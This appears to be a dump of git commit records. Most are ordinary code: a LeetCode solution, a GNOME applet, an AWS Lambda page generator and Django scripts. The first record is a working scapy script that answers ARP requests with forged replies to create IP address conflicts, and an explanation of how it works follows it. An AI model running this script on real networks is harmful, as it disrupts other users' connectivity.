sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
<commit_before><commit_msg>Add network conflict creator script.<commit_after>#!/usr/bin/env python
from base import Base
from argparse import ArgumentParser
from sys import exit
from scapy.all import sniff, Ether, ARP, sendp
from logging import getLogger, ERROR
getLogger("scapy.runtime").setLevel(ERROR)
Base.check_user()
parser = ArgumentParser(description='Network conflict creator script')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for sniffing ARP requests')
parser.add_argument('-p', '--packets', type=int, help='Number of packets (default: 100000)', default=100000)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
args = parser.parse_args()
_number_of_packets = int(args.packets)
_current_number_of_packets = 0
_current_network_interface = ""
if args.interface is None:
_current_network_interface = Base.netiface_selection()
else:
_current_network_interface = args.interface
_current_mac_address = Base.get_netiface_mac_address(_current_network_interface)
if _current_mac_address is None:
print "This network interface does not have mac address!"
exit(1)
_target_mac_address = None
if args.target_mac is not None:
_target_mac_address = args.target_mac
def send_arp_reply(request):
if request.haslayer(ARP):
print "ARP!"
global _current_number_of_packets
global _current_mac_address
if request[ARP].op == ARP.who_has and request[ARP].hwdst == "00:00:00:00:00:00":
sendp(Ether(dst=request[ARP].hwsrc) / ARP(hwdst=request[ARP].hwsrc,
psrc=request[ARP].psrc))
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
exit(0)
if __name__ == "__main__":
print "Sniffing interface: " + str(_current_network_interface)
if _target_mac_address is None:
sniff(filter="arp", prn=send_arp_reply, iface=_current_network_interface)
else:
sniff(lfilter=lambda d: d.src == _target_mac_address,
filter="arp", prn=send_arp_reply, iface=_current_network_interface)
|
|
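The sniffer above targets ARP who-has requests whose target hardware field is still all zeros — the shape of a normal resolution request or an address probe — and answers them from its own MAC while claiming the requester's address, which is what manufactures the conflict. A dependency-free sketch of the packet test the callback performs (field names mirror scapy's ARP layer, but this is plain Python):

ARP_WHO_HAS = 1   # opcode of an ARP request

def should_reply(op, hwdst):
    # True for the pattern answered above: request + zeroed target MAC.
    return op == ARP_WHO_HAS and hwdst == '00:00:00:00:00:00'

print(should_reply(1, '00:00:00:00:00:00'))   # True  -> script sends a reply
print(should_reply(2, '00:00:00:00:00:00'))   # False -> is-at reply, ignored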
3a696d6646d2000997632aa2df15a254209977da
|
py/sliding-window-median.py
|
py/sliding-window-median.py
|
import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
Add py solution for Sliding Window Median
|
Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/
|
Python
|
apache-2.0
|
ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode
|
Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/
|
import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
<commit_before><commit_msg>Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/<commit_after>
|
import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
<commit_before><commit_msg>Add py solution for Sliding Window Median
480. Sliding Window Median: https://leetcode.com/problems/sliding-window-median/<commit_after>import heapq
from collections import Counter
class Solution(object):
def insertElement(self, value):
if self.minHeapSize < self.maxHeapSize:
heapq.heappush(self.maxHeap, -value)
m = self.maxHeapPop()
heapq.heappush(self.minHeap, m)
self.minHeapSize += 1
else:
heapq.heappush(self.minHeap, value)
m = self.minHeapPop()
heapq.heappush(self.maxHeap, -m)
self.maxHeapSize += 1
def minHeapPop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return heapq.heappop(self.minHeap)
def maxHeapPop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -heapq.heappop(self.maxHeap)
def minHeapTop(self):
while self.minRemoved[self.minHeap[0]] > 0:
v = heapq.heappop(self.minHeap)
self.minRemoved[v] -= 1
return self.minHeap[0]
def maxHeapTop(self):
while self.maxRemoved[-self.maxHeap[0]] > 0:
v = -heapq.heappop(self.maxHeap)
self.maxRemoved[v] -= 1
return -self.maxHeap[0]
def windowMedian(self):
if self.maxHeapSize < self.minHeapSize:
return float(self.minHeapTop())
elif self.maxHeapSize > self.minHeapSize:
return float(self.maxHeapTop())
else:
return (self.minHeapTop() + self.maxHeapTop()) / 2.
def removeFromHeaps(self, value):
if self.minHeapSize > 0 and self.minHeapTop() <= value:
self.minRemoved[value] += 1
self.minHeapSize -= 1
else:
self.maxRemoved[value] += 1
self.maxHeapSize -= 1
def medianSlidingWindow(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[float]
"""
self.minHeap, self.maxHeap = [], []
self.minHeapSize, self.maxHeapSize = 0, 0
self.minRemoved = Counter()
self.maxRemoved = Counter()
slidingWindow = []
for i in xrange(k - 1):
self.insertElement(nums[i])
for i in xrange(k - 1, len(nums)):
self.insertElement(nums[i])
slidingWindow.append(self.windowMedian())
self.removeFromHeaps(nums[i - k + 1])
return slidingWindow
|
|
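A quick sanity check for the two-heap, lazy-deletion solution above; this driver is a sketch, not part of the commit, and assumes Python 2 (matching the solution's xrange) plus the Solution class defined in the record above:

# Hypothetical smoke test for the Solution class above.
# For nums = [1, 3, -1, -3, 5, 3, 6, 7] and k = 3, the window medians
# should come out as [1.0, -1.0, -1.0, 3.0, 5.0, 6.0].
if __name__ == '__main__':
    print(Solution().medianSlidingWindow([1, 3, -1, -3, 5, 3, 6, 7], 3))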
5ad4d9e38a7f5c86a499dfad9c6abef2d3697e7e
|
libpanel-applet/test-dbus-applet.py
|
libpanel-applet/test-dbus-applet.py
|
#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
Add test applet in python
|
libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.
|
Python
|
lgpl-2.1
|
GNOME/gnome-panel,GNOME/gnome-panel
|
libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.
|
#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
<commit_before><commit_msg>libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.<commit_after>
|
#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
<commit_before><commit_msg>libpanel-applet: Add test applet in python
This is an example of how to use libpanel-applet from introspection
data.<commit_after>#!/usr/bin/env python
from gi.repository import Gtk
from gi.repository import PanelApplet
def applet_fill(applet):
label = Gtk.Label("My applet in Python")
applet.add(label)
applet.show_all()
def applet_factory(applet, iid, data):
if iid != "TestApplet":
return False
applet_fill(applet)
return True
PanelApplet.Applet.factory_main("TestAppletFactory",
PanelApplet.Applet.__gtype__,
applet_factory, None)
|
|
6187f8ac6cf1637b160b47bba55113490f5abf20
|
Python/lambda_awejob.py
|
Python/lambda_awejob.py
|
# coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
Add lambda code for gen site from awesome job repo
|
Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html
|
Python
|
bsd-2-clause
|
familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG,familug/FAMILUG
|
Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html
|
# coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
<commit_before><commit_msg>Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html<commit_after>
|
# coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html# coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
<commit_before><commit_msg>Add lambda code for gen site from awesome job repo
http://www.familug.org/2017/08/serverless.html<commit_after># coding: utf-8
import json
import urllib.request
import boto3
def lambda_handler(event, context):
with urllib.request.urlopen("https://api.github.com/repos/awesome-jobs/vietnam/issues") as resp: # NOQA
data = resp.read()
d = json.loads(data.decode())
# ff = open('/tmp/issues')
# d = json.load(ff)
# ff.close()
JOBFORMAT = '''<li {style}>{date} <a href="{url}">{title}</a> - {salary}</li>\n''' # NOQA
with open('/tmp/index.html', 'w') as f:
f.write('<html><body>\n')
f.write('<h1>Awesome Jobboard</h1>\n')
f.write('<ul>\n')
for job in d:
title, url = job['title'], job['html_url']
style = 'style="color:gold"' if 'python' in title.lower() else ''
lines = list(filter(None, job['body'].splitlines()))
try:
salary = lines[
lines.index('## Salary Expectation')+1
].strip(' *')
except (IndexError, ValueError):
salary = 'UNKNOWN'
date = job['created_at']
date = date[:date.index('T')]
f.write(JOBFORMAT.format(url=url, title=title,
salary=salary, date=date,
style=style))
f.write('</ul>\n')
f.write('A <a href="https://pymi.vn">PYMIVN</a> toy product\n')
f.write('</body></html>\n')
s3 = boto3.resource('s3')
bucket = s3.Bucket('aj.pymi.vn')
bucket.put_object(ACL='public-read',
Bucket='aj.pymi.vn',
Key='index.html',
Body=open('/tmp/index.html').read().encode(),
ContentType='text/html; charset=utf-8'
)
|
|
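The salary parsing in the handler above relies on a '## Salary Expectation' heading with the value on the next non-empty line; a small illustration of just that step, using a hypothetical issue body rather than real GitHub data:

# Hypothetical issue body illustrating the salary-extraction step above.
body = "## Position\nBackend dev\n\n## Salary Expectation\n**$1000 - $2000**\n"
lines = list(filter(None, body.splitlines()))
salary = lines[lines.index('## Salary Expectation') + 1].strip(' *')
print(salary)  # expected: $1000 - $2000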
135021ff2c64d2bd8e1122f657228e5eb8826196
|
genome_designer/debug/2015_03_02_get_histo_files.py
|
genome_designer/debug/2015_03_02_get_histo_files.py
|
"""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
Debug script to aggregate lumpy histogram files.
|
Debug script to aggregate lumpy histogram files.
|
Python
|
mit
|
woodymit/millstone,churchlab/millstone,woodymit/millstone_accidental_source,woodymit/millstone,churchlab/millstone,woodymit/millstone,woodymit/millstone,churchlab/millstone,woodymit/millstone_accidental_source,woodymit/millstone_accidental_source,churchlab/millstone,woodymit/millstone_accidental_source
|
Debug script to aggregate lumpy histogram files.
|
"""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Debug script to aggregate lumpy histogram files.<commit_after>
|
"""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
Debug script to aggregate lumpy histogram files."""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Debug script to aggregate lumpy histogram files.<commit_after>"""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
|
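The nested os.path.split in the script above names each copied file after its dataset's parent directory; for example, with a hypothetical path:

# Hypothetical path showing how the parent directory becomes the file name.
import os
path = '/data/alignments/sample_42/insert_metrics_histogram.txt'
name = os.path.split(os.path.split(path)[0])[1] + '.txt'
print(name)  # expected: sample_42.txt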
b8dd5d1caff7a47f28e1f24a5a20cdd13a795830
|
barsystem_base/management/commands/undo_transaction.py
|
barsystem_base/management/commands/undo_transaction.py
|
from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
